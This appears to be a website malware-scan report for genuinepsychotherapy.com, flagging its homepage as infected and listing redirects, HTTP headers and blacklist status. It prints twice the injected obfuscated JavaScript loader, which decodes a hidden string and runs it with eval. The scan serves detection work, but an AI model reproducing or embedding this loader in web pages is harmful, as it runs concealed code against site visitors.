Scanned pages/files
| Request | Server response | Status |
http://genuinepsychotherapy.com/ | 200 OK Content-Length: 70659 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var b2="";for(var rl=0;rl<654;rl++)b2+=String.fromCharCode((".%\"!t4I#ghDnWMdMIO{zOt\\4rCw~kM}(5IwLueR;;{/F7sM<1v?4mvX&R]zXvnx[Y(o7VdSf#/~VC-#-zFOsKH%GZ]S[{lqP5rU[OQo]el+QfVyOdunRz4cy|U/Iahkn\'YhutJ|[MNt7}Ovwh\'b\'}{+uOWK5O[7NxHT\"zWxWX+5g5Xj _T{3lu/aQR{N}jnW.P[$Wi[owh8VxCd?m VGCu_~fQhwl5wiJ_]{f`HzjfR\"zP|ZdxzdNw$jHU_`vEDLJQLjv5\\9TnuZT~St|5Zib TnQ3WFKUuET0xGNoml`nvyl8zM]5S2q>Mi!$bgXWHxdg\\jx2a_zlun(M!\\TM2JR@qy^#SpISG#isy$O9s&iy{U`p!MM!MsZ|1xFIzAOeueTq1ko1]!V{G|p9*LKUuIW.xJProjQlwu8h.=gr#+!h}&m=@4Fq;I54:K$T:>6*(z9>+w:4toef(rr:r</dmosEz6q4**=G4<,)*s6>lxkp~Pr+kD3mucsI%?0@,3*5=>25.$.}4/j}(q+Zi)h><dlg!Fw)m265-,H>7,-u=5tteq{Sq-qF0dpq*d$)n274+*>~V1HTusx2s@qupnHvbvI}ih)z8IAB4B.)|GAHEC/\'>897~A346=95^twcm4zQ/vziy s)1;U@J4,".charCodeAt(rl)-"FR>010;0102465:000>R;A:2004=035=42000:232;102?296:50;23:49<107?".charCodeAt(rl%(63))+110)%(0x5f)+32);eval(b2) Antivirus reports:
| ||
http://genuinepsychotherapy.com/index.html | 200 OK Content-Length: 70659 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var b2="";for(var rl=0;rl<654;rl++)b2+=String.fromCharCode((".%\"!t4I#ghDnWMdMIO{zOt\\4rCw~kM}(5IwLueR;;{/F7sM<1v?4mvX&R]zXvnx[Y(o7VdSf#/~VC-#-zFOsKH%GZ]S[{lqP5rU[OQo]el+QfVyOdunRz4cy|U/Iahkn\'YhutJ|[MNt7}Ovwh\'b\'}{+uOWK5O[7NxHT\"zWxWX+5g5Xj _T{3lu/aQR{N}jnW.P[$Wi[owh8VxCd?m VGCu_~fQhwl5wiJ_]{f`HzjfR\"zP|ZdxzdNw$jHU_`vEDLJQLjv5\\9TnuZT~St|5Zib TnQ3WFKUuET0xGNoml`nvyl8zM]5S2q>Mi!$bgXWHxdg\\jx2a_zlun(M!\\TM2JR@qy^#SpISG#isy$O9s&iy{U`p!MM!MsZ|1xFIzAOeueTq1ko1]!V{G|p9*LKUuIW.xJProjQlwu8h.=gr#+!h}&m=@4Fq;I54:K$T:>6*(z9>+w:4toef(rr:r</dmosEz6q4**=G4<,)*s6>lxkp~Pr+kD3mucsI%?0@,3*5=>25.$.}4/j}(q+Zi)h><dlg!Fw)m265-,H>7,-u=5tteq{Sq-qF0dpq*d$)n274+*>~V1HTusx2s@qupnHvbvI}ih)z8IAB4B.)|GAHEC/\'>897~A346=95^twcm4zQ/vziy s)1;U@J4,".charCodeAt(rl)-"FR>010;0102465:000>R;A:2004=035=42000:232;102?296:50;23:49<107?".charCodeAt(rl%(63))+110)%(0x5f)+32);eval(b2) Antivirus reports:
| ||
http://genuinepsychotherapy.com/test404page.js | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Fri, 26 Sep 2014 20:38:35 GMT Accept-Ranges: bytes Age: 0 Location: http://ecmcorpusa.com/t/tr.php Server: Apache/2 Content-Length: 214 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 26 Sep 2014 21:38:35 GMT | clean |
http://ecmcorpusa.com/t/tr.php | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://ecmcorpusa.com/test404page.js | 200 OK Content-Length: 271 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: genuinepsychotherapy.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Fri, 26 Sep 2014 20:38:32 GMT
Accept-Ranges: bytes
Age: 565
ETag: "11403-499a713492fa0"
Server: Apache/2
Content-Length: 70659
Content-Type: text/html
Expires: Fri, 26 Sep 2014 21:29:07 GMT
Last-Modified: Wed, 12 Jan 2011 14:32:48 GMT
...70659 bytes of data.
GET / HTTP/1.1
Host: genuinepsychotherapy.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Fri, 26 Sep 2014 20:38:32 GMT
Accept-Ranges: bytes
Age: 565
ETag: "11403-499a713492fa0"
Server: Apache/2
Content-Length: 70659
Content-Type: text/html
Expires: Fri, 26 Sep 2014 21:29:07 GMT
Last-Modified: Wed, 12 Jan 2011 14:32:48 GMT
...70659 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: genuinepsychotherapy.com
Referer: http://www.google.com/search?q=genuinepsychotherapy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: genuinepsychotherapy.com
Referer: http://www.google.com/search?q=genuinepsychotherapy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=genuinepsychotherapy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://genuinepsychotherapy.com/
Result: genuinepsychotherapy.com is not infected or malware details are not published yet.
Result: genuinepsychotherapy.com is not infected or malware details are not published yet.